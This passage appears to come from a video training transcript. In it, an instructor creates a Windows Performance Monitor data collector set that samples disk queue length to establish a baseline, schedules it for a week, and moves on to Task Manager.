It means, perhaps, that the server is simply doing its job, it's dealing with file I/O for instance. So, again, you
need a baseline of normal activity for your particular environment before a lot of this becomes truly
meaningful and useful to make decisions from. Speaking of making decisions and establishing baselines, over
here on the left, if I go into Data Collector Sets, [He expands the Data Collector Sets folder from the
navigation pane. It displays various subfolders such as User Defined and System.] I could build a custom,
user-defined data collector set. So I could right-click here and choose New > Data Collector Set. [The Create
new Data Collector Set wizard opens. It includes a Name textbox and two radio buttons, Create from a
template (Recommended) and Create manually (Advanced). It also has three buttons at the bottom: Next,
Finish, and Cancel.] Maybe I'll call this Establish Baseline, because what I could do is gather performance
metrics over time on this particular host, although it could be counters from remote hosts over the network. So
I'm going to choose Create manually here, and I'll click Next. [The next page of the wizard contains two radio
buttons, Create data logs and Performance Counter Alert. The Create data logs radio button has three
checkboxes listed under it, namely Performance counter, Event trace data, and System configuration
information.] And what I want to do here is work with performance counters, so I'll turn on the check box for
performance counter, and I'll click Next. [The next page of the wizard includes a Performance counters field
and two buttons, Add and Remove. It also has a spin box for Sample interval and a drop-down list box for
Units.] Then I click Add to choose the specific performance counters from the local, or even remote
computers. [The add counters dialog box opens.] So we have options related for that, so I'm going to scroll
down to, again, the P, physical disk section. And just for consistency, maybe we'll choose the average disk
queue length here, and I'll add it for all instances, I'll click Add, and OK. And I'm going to have that sampled,
let's say every 15 minutes, and I'll click Next, I'll accept the defaults. And on the last screen, though, what I do
want to do is open up the properties for the data collector set. So I have to turn that option on, and then I'll
click Finish. [The wizard closes and the EST Baseline Properties dialog box opens. It includes various tabs
such as General, Security, and Schedule.] I want that option because here I can go to the Schedule tab, where I
can add a schedule, [He clicks the Add button at the bottom of the Schedule tab. A Folder Action dialog box
opens.] in terms of when I want this data collector set to begin gathering information, on which days of the
week and so on.
So maybe I'll have it start, let's see here, on the following Monday, September 19th. And I'll have it expire,
maybe, at the end of that week, September 23rd. So I have five business days worth of working data, and then
I'll click OK. [The dialog box closes.] So then I'll be able to see reports down here, [He expands the reports
folder in the navigation pane.] for example, for user defined items like Establish Baseline, over time, once it's
gathered that information and the schedule has kicked in. Now of course, aside from Performance Monitor,
which I'll close, we can also go into the good old Task Manager. So, one of the ways I can do that, of course, is
to search for it. So I'm going to search for Task Manager here in my Start menu, I'm g